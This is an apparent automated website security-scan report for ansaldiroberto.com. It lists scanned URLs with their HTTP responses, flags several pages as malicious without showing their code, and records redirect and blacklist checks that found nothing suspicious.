Scanned pages/files
Request | Server response | Status |
http://ansaldiroberto.com/ | 200 OK Content-Length: 1865 Content-Type: text/html | clean |
http://ansaldiroberto.com/aligocydi.html | 200 OK Content-Length: 321 Content-Type: text/html | clean |
http://ansaldiroberto.com/test404page.js | 404 Not Found Content-Length: 518 Content-Type: text/html | clean |
http://ansaldiroberto.com/amlopres-z.html | 200 OK Content-Length: 44806 Content-Type: text/html | clean |
http://afterpill.ru/js/jquery.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://ansaldiroberto.com/atrovent.html | 403 Forbidden Content-Length: 521 Content-Type: text/html | clean |
http://ansaldiroberto.com/aviny.html | 200 OK Content-Length: 259 Content-Type: text/html | clean |
http://ansaldiroberto.com/cgi-bin/ | 403 Forbidden Content-Length: 516 Content-Type: text/html | clean |
http://ansaldiroberto.com/chrystal.html | 200 OK Content-Length: 11771 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses.
http://ansaldiroberto.com/corrianne.html | 200 OK Content-Length: 14046 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses.
http://ansaldiroberto.com/crystal.html | 200 OK Content-Length: 14011 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses.
http://ansaldiroberto.com/danell.html | 200 OK Content-Length: 13997 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses.
http://ansaldiroberto.com/diane.html | 200 OK Content-Length: 13997 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses.
http://ansaldiroberto.com/egohify.html | 200 OK Content-Length: 281 Content-Type: text/html | clean |
http://ansaldiroberto.com/inabedyna.html | 200 OK Content-Length: 227 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ansaldiroberto.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 07:25:38 GMT
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 1865
Content-Type: text/html;charset=ISO-8859-1
...1865 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ansaldiroberto.com
Referer: http://www.google.com/search?q=ansaldiroberto.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ansaldiroberto.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ansaldiroberto.com/
Result: ansaldiroberto.com is not infected or malware details are not published yet.